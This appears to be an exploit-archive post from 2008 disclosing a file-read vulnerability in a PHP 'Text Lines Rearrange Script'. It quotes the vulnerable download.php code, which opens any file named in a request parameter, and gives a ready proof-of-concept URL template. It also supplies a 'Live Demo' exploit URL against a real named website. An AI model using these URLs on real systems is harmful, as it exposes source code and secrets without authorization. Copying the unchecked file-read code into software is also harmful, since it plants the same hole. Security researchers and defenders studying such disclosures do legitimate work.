[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Text Lines Rearrange Script (filename) File Disclosure Vulnerability
# Published : 2008-12-22
# Author : SirGod
# Previous Title : RSS Simple News (news.php pid) Remote SQL Injection Exploit
# Next Title : Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vuln
#############################################################################################
[+] Text Lines Rearrange Script (download.php filename) File
Disclosure Vulnerability
[+] Discovered By SirGod
[+] Visit : www.h4cky0u.org
[+] Greetz : All my friends
#############################################################################################
[+] File Disclosure Vulnerability
Vulnerable Code in download.php :
-----------------------------------------------------
if(file_exists($filename))
{
$fp=fopen($filename,"r");
$content=fread($fp,filesize($filename));
fclose($fp);
------------------------------------------------------
PoC :
http://[target]/[path]/download.php?filename=[Local File]
Example :
http://[target]/[path]/download.php?filename=index.php
Live Demo :
http://www.rightscripts.com/listrearrange/download.php?filename=index.php
#############################################################################################
# www.Syue.com [2008-12-22]